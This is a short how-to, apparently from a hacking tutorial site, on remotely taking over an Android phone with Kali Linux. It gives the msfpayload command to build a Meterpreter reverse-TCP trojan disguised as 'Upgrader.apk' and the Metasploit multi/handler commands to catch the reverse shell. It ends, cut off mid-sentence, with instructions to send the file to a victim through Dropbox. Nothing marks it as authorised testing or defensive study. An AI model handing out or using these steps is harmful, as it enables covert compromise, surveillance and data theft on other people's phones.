How To Remotely Hack Android Device Using Kali Linux
Step 1 Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) Step 2 Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3 Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external) Step 4 Exploit! At last type: exploit t o start the listener. Copy the application that you made (Upgrader.apk) from the root folder, to you android phone. Then send it using Uploading it to Dropbox...